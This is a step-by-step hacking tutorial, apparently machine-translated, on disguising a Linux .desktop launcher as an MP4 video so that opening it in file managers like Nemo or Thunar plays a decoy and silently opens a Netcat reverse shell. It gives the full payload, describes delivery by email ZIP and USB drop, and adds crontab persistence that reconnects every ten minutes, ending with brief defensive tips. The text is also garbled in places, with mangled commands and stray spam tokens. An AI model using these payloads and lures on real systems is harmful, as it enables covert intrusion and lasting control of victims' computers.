What appears to be an ordinary MP4 may have been designed by an attacker to compromise your Linux Mint operating system. Opening the file will indeed play the targeted video, but it will also silently establish a connection to the attacker's system.
Although this article uses Linux Mint as an example, the attack benefits from a problem in various Linux file managers. The GIF below demonstrates the attack.
Two files are extracted in the GIF. The first (real_video.mp4) is a real MP4 from a movie trailer. The second file (fake_video.mp4) is a .desktop file, configured to resemble a normal MP4 in this file manager. What we cannot see in the GIF is the Netcat connection that is made to the attacker's system when fake_video.mp4 is opened. The target believes that fake_video.mp4 is legitimate and has no idea that the operating system has just been compromised.
The .desktop file extension is used in Linux systems to create application launchers. Linux Mint users can view files in the / usr / share / applications / folder for some examples.
$ is -l /usr/share/applications/*.desktop -rw-r - r-- 1 root root 125 Nov 4 2017 /usr/share/applications/apturl.desktop -rw-r - r-- 1 root root 8754 28 Nov 04:55 /usr/share/applications/blueberry.desktop -rw-r - r-- 1 root root 1383 January 11 11:41 /usr/share/applications/bluetooth-sendto.desktop -rw-r - r-- 1 root root 363 21 March 09:45 /usr/share/applications/cinnamon2d.desktop -rw-r - r-- 1 root root 448 December 6 05:22 /usr/share/applications/cinnamon-color-panel.desktop -rw-r - r-- 1 root root 300 December 6 05:22 /usr/share/applications/cinnamon-control-center.desktop -rw-r - r-- 1 root root 463 21 March 09:45 /usr/share/applications/cinnamon.desktop -rw-r - r-- 1 root root 496 December 6 05:22 /usr/share/applications/cinnamon-display-panel.desktop -rw-r - r-- 1 root root 200 Mar 21 09:45 /usr/share/applications/cinnamon-killer-daemon.desktop -rw-r - r-- 1 root root 272 Mar 21 09:45 /usr/share/applications/cinnamon-menu-editor.desktop -rw-r - r-- 1 root root 450 dec 6 05:22 /usr/share/applications/cinnamon-network-panel.desktop -rw-r - r-- 1 root root 504 December 6 05:22 /usr/share/applications/cinnamon-online-accounts-panel.desktop -rw-r - r-- 1 root root 11580 21 March 09:45 /usr/share/applications/cinnamon-onscreen-keyboard.desktop -rw-r - r-- 1 root root 504 December 6 05:22 /usr/share/applications/cinnamon-region-panel.desktop -rw-r - r-- 1 root root 433 December 11th 03:24 /usr/share/applications/cinnamon-screensaver.desktop -rw-r - r-- 1 root root 12473 21 March 09:45 /usr/share/applications/cinnamon-settings-applets.desktop ... -rw-r - r-- 1 root root 506 Dec 15, 2017 /usr/share/applications/seahorse.desktop -rw-r - r-- 1 root root 10609 March 26, 2018 /usr/share/applications/simple-scan.desktop -rw-r - r-- 1 root root 8996 10 May 2018 /usr/share/applications/synaptic.desktop -rw-r - r-- 1 root root 518 3 Apr. 2018 /usr/share/applications/system-config-printer.desktop -rw-r - r-- 1 root root 10062 25 March 07:28 /usr/share/applications/thunderbird.desktop -rw-r - r-- 1 root root 820 30 Nov 08:53 /usr/share/applications/timeshift-gtk.desktop -rw-r - r-- 1 root root 11701 2 August 2017 /usr/share/applications/tomboy.desktop -rw-r - r-- 1 root root 4493 February 6, 2018 /usr/share/applications/transmission-gtk.desktop -rw-r - r-- 1 root root 3617 10 Apr. 2018 /usr/share/applications/vim.desktop -rw-r - r-- 1 root root 9870 October 6, 2018 /usr/share/applications/vlc.desktop -rw-r - r-- 1 root root 992 December 10 11:48 /usr/share/applications/xdg-desktop-portal-gtk.desktop -rw-r - r-- 1 root root 4526 Dec 11 06:10 /usr/share/applications/xed.desktop -rw-r - r-- 1 root root 9762 December 11th 06:12 /usr/share/applications/xplayer.desktop -rw-r - r-- 1 root root 8056 December 11th 06:15 /usr/share/applications/xreader.desktop -rw-r - r-- 1 root root 5309 December 11th 06:18 /usr/share/applications/xviewer.desktop -rw-r - r-- 1 root root 3780 December 17 05:45 /usr/share/applications/yelp.desktop cialis19659008 extensions View this folder in Nemo, the built-in file manager of Linux Mint, the same .desktop files are displayed as clickable buttons.
With cat on one of the operating system's legitimate .desktop files, the following information is displayed.
$ cat /usr/share/applications/cinnamon-settings-calendar.desktop [Desktop Entry] Icon = cs-date-time Exec = cinnamon settings calendar Type = Application OnlyShowIn = X-Cinnamon; Categories = Settings;
The most important rules to take into account are the values Icon = and Exec = . The icon value is responsible for the icon used to display the .desktop file. The Exec value is responsible for the command (s) executed when the target clicks on the .desktop file. In this case, clicking on the file executes the command cinnamon settings with the option calendar . If you click on this file, the "Date and time" settings window will open.
An attacker could exploit this functionality to change how the .desktop file is displayed to the user and which program (& # 39; s) is started when the file is clicked while it is in the file manager.
Which operating systems affect?
There are several notable desktop environments (DE) that are affected by this problem. They include: GNOME, Cinnamon, MATE, KDE, XFCE4 and LXDE. Although this is far from an extensive list of available DE & # 39; s, these are among the most popular.
Each DE uses a different file manager by default. For example, GNOME uses the Nautilus file manager and KDE uses the Dolphin file manager. None of these file managers are vulnerable to this attack. But! Keep in mind - it is possible to install and use multiple file managers in one operating system, just like when two different web browsers are installed at the same time. So a GNOME target with Nautilus installed can use a different, vulnerable file manager.
The purpose of this article is to shed some light on the vulnerability in Cinnamon's standard file manager, Nemo. Like the Thunar file manager in XFCE4 systems, Nemo is vulnerable to this attack.
In my short series of tests against popular operating systems, this is what I could determine, ordered in the following OS / DE / File Manager format.
- Ubuntu 18.04 / GNOME / Nautilus
- Debian 10 / GNOME / Nautilus
- Elemental OS 5 / Pantheon / Pantheon-Files
- Manjaro 18 / KDE / Dolphin Systems affected:
- Linux Mint 19.2 / Cinnamon / Nemo
- Xubuntu 18.04 / XFCE4 / Thunar
- Fedora 30 / MATE / Caja
- MX Linux / XFCE4 / Thunar
How to identify as the file manager of a target is vulnerable
It is not an easy task to determine whether the target uses a vulnerable file manager, especially if the attacker knows nothing about the operating system of the target. However, if the attacker shares a Wi-Fi network for the purpose, it would be possible to observe traffic sending to and from the operating system. The DNS requests for a Linux Mint operating system look like this:
Similarly, MX Linux operating systems also use custom repositories (shown below) when retrieving of system updates.
Determining the DE or file manager may not be possible without the target sharing identifiable information on social media or in any other way. Make sure you leave tips and ideas for enumerating this information in the comments!
We need to set up a simple HTTP server in Kali to host the real_video.mp4 file. When the target clicks on the fake_video.desktop, the real_video.mp4 is automatically downloaded and played. Start installing Python3 on your Kali system as root.
~ # apt-get update && apt-get install python3 Read package lists ... Ready Read package lists ... Ready Build dependency structure Read status information ... Done python3 is already the newest version (3.7.2-1). python3 set to installed manually. 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Then use the command mkdir to create a temporary folder to save the attack files that we create.
~ # mkdir -p / tmp / pythonServer / videos
Then go to the new folder with video & # 39; s.
~ # cd / tmp / pythonServer / videos /
Step 2: Install YouTube dl
YouTube dl is a platform-independent command-line tool that is used to download YouTube videos & # 39; s. The version of youtube-dl in the Kali Linux repository is usually a bit outdated, so consult the GitHub repo for the latest version. Use the command below to install it.
~ # curl -L https://yt-dl.org/downloads/latest/youtube-dl -o / usr / local / bin / youtube-dl % Total% Received% Xferd Average speed Time Time Time Current Dload Upload total issued left speed 100 1709k 100 1709k 0 0 70872 0 0:00:24 0:00:24 -: -: - 406k
Then give the new youtube-dl binary permissions to run on the system with the chmod command.
~ # chmod a + rx / usr / local / bin / youtube-dl
Step 3: Download a YouTube video
In real scenarios, relevant video & # 39; s must be used to the trick to cheat target user to believe that the fake_video file is in fact a real video. For demonstration purposes I use the rickroll.
~ # youtube-dl --restrict filenames -f 18 & # 39; https: //www.youtube.com/watch? V = dQw4w9WgXcQ & # 39; [youtube] dQw4w9WgXcQ: download web page [youtube] dQw4w9WgXcQ: Download web page with video info [youtube] dQw4w9WgXcQ: Download js player vflptN-I_ [youtube] dQw4w9WgXcQ: Download js player vflptN-I_ [download] Destination: Rick_Astley _-_ Never_Gonna_Give_You_Up_Official_Music_Video-dQw4w9WgXcQ.mp4 [download] 100% of 15.18MiB in 00:07
The file name is likely to be incorrect characters. Rename the video file for simplicity. Use the following mv command with the wildcard (*) to rename it.
~ # mv Rick * .mp4 real_video.mp4
The command ls can then be used to view the contents of the folder and the renamed file.
~ # is -1 -rw-r - r-- 1 root root 15915462 December 10 01:55 real_video.mp4
Use a desired text editor such as Gedit, Geany, Vim or nano to create a Create a new "fake_video.desktop" file. In the example below, nano is used.
~ # nano fake_video.desktop
Then copy the text below to the new file. The .desktop file extension is vital; the attack will not work without it.
#! / usr / bin / env xdg open [Desktop Entry] Encoding = UTF-8 Name = fake_video.mp4 Exec = / usr / bin / wget & # 39; http: //192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; / usr / bin / xdg-open /tmp/real_video.mp4; / usr / bin / mkfifo / tmp / f; / bin / nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > / tmp / f 2> & 1 & Terminal = false Type = Application Pictogram = video x-generic
Different commands are executed ( Exec = ) and concatenated in one line, separated by semicolons & # 39; s. I will split the one-liner into parts to better explain each command.
- / usr / bin / wget & # 39; http: //192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; - Wget downloads the real_video.mp4 file from the attacker's system to the target. It is stored in the / tmp folder with the same file name. Change the 192.168.1.XX address during the payload to the IP address of the attacker's Kali system.
- / usr / bin / xdg open /tmp/real_video.mp4; cialis19459022] - The xdg open command opens files with the desired video player of the target operating system. If the target prefers VLC to MPV or another Linux video player, real_video.mp4 is automatically played on VLC. Opening the video with the desired media player will hopefully prevent the target from discovering the fake_video.desktop.
- / usr / bin / mkfifo / tmp / f; - Mkfifo creates a pipe to redirect everything from the following Netcat data to and from the attacker's system:
- / bin / nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > / tmp / f 2> & 1 & - Netcat and Bash are used (with the aforementioned pipe) to connect to the attacker systems (do not forget to change the XX in the IP address here to that of the attacker). The port number (1234) is random and can be any number between 1 and 65535.
The image Icon = can be changed here. Icon file names can be found in the / usr / share / icons / Mint-Y / mime types / 128 / folder. The file extension (.png) can be omitted when creating .desktop files, but this is not necessary. Any file in the / usr / share / icons / folder can be used as a .desktop file icon. For example, text files (text-x-generic), ZIP files (package-x-generic) and any other file type with a supporting PNG in the icons / directory can be used. There is a lot of room to be creative with social engineering attacks here (fake ZIP file shown below).
Change the fake_video.desktop file permissions with the chmod command to increase its permissions.
~ # chmod + x fake_video.desktop
The new permissions are verified by specifying the contents of the directory. Note the export duties ( -rwxr-xr-x ).
~ # is -1 -rwxr-xr-x 1 root root 353 12 April 06:27 fake_video.desktop -rw-r - r-- 1 root root 15915462 December 10 01:55 real_video.mp4
Python3 creates a web server on port 80 and creates the real_video .mp4 available in the directory for everyone on the network. Alternatively, this web server can be set to a virtual private server for external purposes.
~ # python3 -m http.server 80 Serve on HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
The Python3 terminal must remain open until the target clicks on the fake_video.desktop file. If the Python3 server is not accessible when the target opens the fake_video, no video will be played, but the target's computer will still establish the Netcat connection.
Step 7: Launch the Netcat Listener
Netcat will listen ( -1 ) on any available IPv4 interface that uses port ( -p ) 1234. This port number is random, but don't forget to display the change in the fake_video.desktop Exec = command made in Step 5. The -vv will print a more extensive, detailed output. Extensive outputs can be useful when debugging connections.
~ # nc -vv -l -p 1234
With the installation of Python3 and Netcat, the attacker can deliver fake_video .desktop to the target. I have described two simple delivery methods below, but this is far from an exhaustive list of attack vectors. Other tactics are possible if the attacker knows more about the goal.
Email is a good vector for sharing files. If the target operating system has been discovered or it is known that Linux systems are being implemented in the workplace, email delivery is an ideal option. In this scenario, compressing the file (s) with zip is necessary to prevent email clients and web browsers from displaying the .desktop file extension when sharing the file.
It may be desirable to record a lot. desktop payloads in the ZIP sent to the target for a convincing social engineering attack. Or, perhaps, mixing real files with fake_videos.
First make sure that zip is installed, because it is not included in all versions of Kali.
~ # apt-get install zip Read package lists ... Ready Build dependency structure Read status information ... Done The following NEW packages are installed: zipper 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Must receive 234 kB of archives. After this operation, an additional 623 KB of disk space is used. Retrieved 234 kB in 6s (37.4kB / s) Select previously unselected package zip. (Read database ... 175224 files and folders that are currently installed.) Preparation for unpacking ... / zip_3.0-11 + b1_amd64.deb ... Unpacking the zipper (3.0-11 + b1) ... Set zip (3.0-11 + b1) ... Processing triggers for man-db (2.8.5-2) ...
In the video & # 39; s / folder, use the command below zip to compress all files in the folder.
~ # zip -r videos.zip ../videos/ add: ../videos/ (saved 0%) add: ../videos/real_video.mp4 (deflated 0%) add: ../videos/fake_video.desktop (deflated 33%)
Zip will recursively ( -r ) compress all files in the ../videos/ folder in a "videos.zip" it file. When that is done, the videos.zip file can be mailed to the target (s).
Option 2: USB Drop
Readers may know that I am a fan of USB drop attacks. Nearly 50% of all USB & 39s found in the wild are picked up, placed in a computer and inspected by unsuspecting targets. The lone USB is an excellent attack vector because it is aimed specifically at the computer - an email attachment can be opened using the smartphone of the target. When the target inserts the USB drive into his / her machine, Nemo will automatically attempt to link it and display the fake_video.desktop as "fake_video.mp4" - so no file compression is required.
For more information on the science of targeted social engineering attacks, view "Hack WPA2 Wi-Fi Passwords Using USB Dead Drops." Similarly, shared USB & # 39; s in the workplace can be configured to mimic or clone real files on the USB and swap them with malicious payloads.
To perform a USB drop attack, start by inserting the USB drive intended for the target into the Kali system. Then mount the USB drive and use the cp command below to copy the fake_video.desktop to the drive.
~ # cp /tmp/pythonServer/videos/*.desktop / media / root / USB NAME HERE /
Then eject the USB stick and leave it in a place where only the intended purpose (s) ) will find.
When the fake_video .desktop is clicked, a connection is established with the Netcat listener (shown below).
~ # nc -vv-1 -p 1234 listen on [any] 1234 ... connect with [192.168.1.XX] from () [192.168.1.78] 37538 target_user @ Linux-Mint: ~ $
At this time, it is usually a good idea to establish some degree of persistence in the target computer. In the event that the original Netcat connection is lost or lost, it may be desirable to reconnect in some way to the compromised Linux Mint device. A simple form of persistence can be configured using crontab .
Cron is a task scheduler found in the Mint and Ubuntu operating systems. Cron tasks are often used by system administrators to automate repetitive tasks, such as making weekly backups and performing a specific task when the operating system is restarted.
To ensure that Netcat maintains the connection to the attacker's system, echo the commands below in crontab . With these commands, the Mint device connects to the attacker's server every ten minutes.
echo & # 39; * / 10 * * * * / usr / bin / mkfifo / tmp / v; / bin / nc 192.168.1.XX 9999 < /tmp/v | /bin/bash -i > / tmp / v 2> & 1 & & # 39; crontab -
These are the same mkfifo and Netcat commands used in the fake_video.desktop payload in step 5. Start a new Netcat listener in the Kali system to receive connections from the machine of the target.  ~ # nc -vv -l -p 9999
As long as the target is connected to the same network, the compromised device connects to the Netcat listener every ten minutes. If the Netcat listener is not active, the target computer will fail and try again at the next interval.
How to Protect Yourself from .desktop Attacks
- File Managers – The Nemo and Thunar file managers found in Cinnamon and XFCE4 are vulnerable to this type of attack. Try the Nautilus or Dolphin file managers instead. They can be installed using the command below.
~ # apt-get install nautilus dolphin
After installation, open the settings for preferred applications.
Change the File Manager to "Files" with the blue file icon, this is Nautilus.
Clicking on folders now opens the Nautilus file manager and not Nemo. The fake_video.desktop appears in its true form when using this file manager.
- Sandboxes – It is possible to sandbox specific applications and processes with tools such as Firejail. Firejail reduces the risk of security breaches by using lightweight visualization technology to isolate applications and limit them to sandboxed (container) environments. The GIF below demonstrates the opening of an unsafe file in an environment with many sandboxes.
For more information about hardening Ubuntu-based operating systems such as Linux Mint, see "Using Ubuntu as Your Primary Operating System, Part 3 (Application Hardening & Sandboxing) . "
- Right-click – Double-clicking on random files is generally considered a good practice. In the case of this attack, right-clicking reveals the files and tries to open them with a particular program that recommends fake_video.mp4 text editors and not video players such as VLC and MPV. That is because the operating system knows that it is a .desktop file that contains text.
Follow me on Twitter @tokyoneon_ and GitHub if you liked this article. For all questions and comments you can send me a message or leave a comment.